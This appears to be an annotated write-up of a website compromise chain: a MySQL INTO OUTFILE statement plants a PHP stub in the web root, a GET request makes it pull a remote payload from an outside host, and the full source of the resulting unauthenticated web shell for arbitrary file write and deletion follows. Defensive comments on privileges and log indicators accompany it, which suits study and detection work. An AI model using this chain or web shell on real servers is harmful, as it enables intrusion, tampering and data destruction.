author:园长
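sql (the PHP stub between the quotes appears to have been stripped from this page; the statement writes a file into the web root, which succeeds only when the database account holds the FILE privilege and secure_file_priv allows that directory — withholding both, and keeping the web root non-writable for the database user, blocks this step):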
select '' into outfile'/var/www/html/xxx/data/conf_ads.php'
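GET (request to the file written by the statement above; the file and url parameters suggest the stub fetches the remote url and saves it under the given name — in access logs, a request to a script under data/ carrying an off-site url= parameter is the indicator to look for):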
http://www.XXX.com.cn/data/conf_ads.php?file=admin3.php&url=http://p2j.cn/1.txt
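1.txt (the remote file named in the url parameter; HTML markup inside its string literals was lost in extraction, so the echo statements below show empty strings):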
";
/**
 * Print a listing of $path when it is a directory, otherwise take the "File:" branch.
 *
 * This is the browsing half of a web file manager planted on a compromised server.
 * NOTE(review): markup inside the string literals appears to have been stripped from this
 * page, so what the non-directory branch originally displayed cannot be told from here.
 *
 * @param $path    Filesystem path supplied by the caller; no restriction to a base directory is applied.
 * @param $charset Value concatenated into the Content-Type header without validation.
 */
function getFile($path,$charset) {
// The caller-supplied charset goes straight into a response header.
header("Content-Type:text/html;charset=".$charset);
if (is_dir($path)) {
$dir = opendir ( $path );
// Each directory entry name is echoed as-is, with no HTML escaping.
while ( $file = readdir ( $dir ) ) {
echo "".$file."
";
}
closedir($dir);
} else {
// Non-directory path: only the "File:" label survives in this listing.
echo "File:
";
echo "";
}
echo "";
}
/**
 * Write $data to $filename with file_put_contents() and echo a (now empty) status string.
 *
 * Neither argument is checked, so this is an arbitrary file write with the privileges of the
 * PHP process. Defender view: file-integrity monitoring on the web root and a web root that
 * the PHP process cannot write to are the controls that catch or block this.
 *
 * @param $filename Target path, taken unmodified from the caller.
 * @param $data     Content written to the target, taken unmodified from the caller.
 */
function update($filename,$data){
file_put_contents($filename, $data);
echo "";
}
// Request dispatcher: every branch is selected and parameterised by $_POST fields, and no
// authentication or origin check is visible anywhere in this listing.
// Defender view: POST bodies carrying the fields action, file, data, p or charset to an
// unexpected script in the web root match this file manager's interface.
if('update'==$_POST['action']){
// action=update: write the posted data to the posted path.
update($_POST['file'],$_POST['data']);
}else if('delete'==$_POST['action']){
// action=delete: remove the posted path if it exists.
if(file_exists($_POST['file'])){
unlink($_POST['file']);
echo "";
}
}else{
// Any other request: browse the posted path p, defaulting to the document root, with the
// posted charset, defaulting to UTF-8.
getFile($_POST['p']!=''?$_POST['p']:$_SERVER['DOCUMENT_ROOT'],$_POST['charset']!=''?$_POST['charset']:"UTF-8");
}
?>